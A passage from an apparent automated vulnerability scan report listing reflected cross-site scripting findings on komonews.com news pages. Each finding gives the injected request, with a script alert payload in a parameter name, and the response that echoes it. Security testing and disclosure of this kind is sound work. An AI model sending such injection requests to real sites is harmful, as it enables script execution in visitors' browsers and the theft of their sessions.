Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 60209


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Man held o
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116404039.html?49972"><script>alert(1)</script>1d3733e8d04=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.453. http://www.komonews.com/news/national/116502428.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116502428.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a05a6"><script>alert(1)</script>ef92945c33c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116502428.html?a05a6"><script>alert(1)</script>ef92945c33c=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57722


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Iowa girl
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116502428.html?a05a6"><script>alert(1)</script>ef92945c33c=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.454. http://www.komonews.com/news/national/116713504.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116713504.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ceb2"><script>alert(1)</script>089115a8881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116713504.html?5ceb2"><script>alert(1)</script>089115a8881=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Dems leave
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116713504.html?5ceb2"><script>alert(1)</script>089115a8881=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.455. http://www.komonews.com/news/national/116734714.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116734714.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd604"><script>alert(1)</script>91f36b20a5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116734714.html?dd604"><script>alert(1)</script>91f36b20a5c=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 58164


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Pirates ma
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116734714.html?dd604"><script>alert(1)</script>91f36b20a5c=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.456. http://www.komonews.com/news/national/116736489.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116736489.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac900"><script>alert(1)</script>52506779f42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116736489.html?ac900"><script>alert(1)</script>52506779f42=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56584


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Report: Ex
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116736489.html?ac900"><script>alert(1)</script>52506779f42=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.457. http://www.komonews.com/news/national/116736624.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116736624.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49136"><script>alert(1)</script>43c868099eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116736624.html?49136"><script>alert(1)</script>43c868099eb=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55718


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   EPA to eas
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116736624.html?49136"><script>alert(1)</script>43c868099eb=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.458. http://www.komonews.com/news/national/116747399.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116747399.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddaa9"><script>alert(1)</script>a2d335a52c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116747399.html?ddaa9"><script>alert(1)</script>a2d335a52c2=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 60578


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Americans
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116747399.html?ddaa9"><script>alert(1)</script>a2d335a52c2=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.459. http://www.komonews.com/news/national/116750534.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116750534.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d14"><script>alert(1)</script>2c00cde6822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116750534.html?38d14"><script>alert(1)</script>2c00cde6822=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57241


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Gov't reve
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116750534.html?38d14"><script>alert(1)</script>2c00cde6822=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.460. http://www.komonews.com/news/national/116750784.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116750784.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d549"><script>alert(1)</script>6657e3e05de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116750784.html?8d549"><script>alert(1)</script>6657e3e05de=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54354


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Oil prices
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116750784.html?8d549"><script>alert(1)</script>6657e3e05de=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.461. http://www.komonews.com/news/offbeat/116565253.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116565253.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35879"><script>alert(1)</script>07658b738cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116565253.html?35879"><script>alert(1)</script>07658b738cd=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53461


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Stop or we
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116565253.html?35879"><script>alert(1)</script>07658b738cd=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.462. http://www.komonews.com/news/offbeat/116611588.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116611588.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f370e"><script>alert(1)</script>8e786bde4d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116611588.html?f370e"><script>alert(1)</script>8e786bde4d6=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54817


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Britain mu
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116611588.html?f370e"><script>alert(1)</script>8e786bde4d6=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.463. http://www.komonews.com/news/offbeat/116622758.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116622758.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d672"><script>alert(1)</script>4a6f14d0e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116622758.html?9d672"><script>alert(1)</script>4a6f14d0e5a=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57019


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Non-alcoho
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116622758.html?9d672"><script>alert(1)</script>4a6f14d0e5a=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.464. http://www.komonews.com/news/offbeat/116623473.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116623473.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc44"><script>alert(1)</script>5d6eef18dfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116623473.html?acc44"><script>alert(1)</script>5d6eef18dfc=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53376


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Hondurans
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116623473.html?acc44"><script>alert(1)</script>5d6eef18dfc=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.465. http://www.komonews.com/news/offbeat/116690659.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116690659.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa97f"><script>alert(1)</script>9a838f8e8f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116690659.html?aa97f"><script>alert(1)</script>9a838f8e8f3=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53372


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Mom gives
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116690659.html?aa97f"><script>alert(1)</script>9a838f8e8f3=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.466. http://www.komonews.com/news/offbeat/116708664.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116708664.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1809"><script>alert(1)</script>2d2f9577483 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116708664.html?d1809"><script>alert(1)</script>2d2f9577483=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
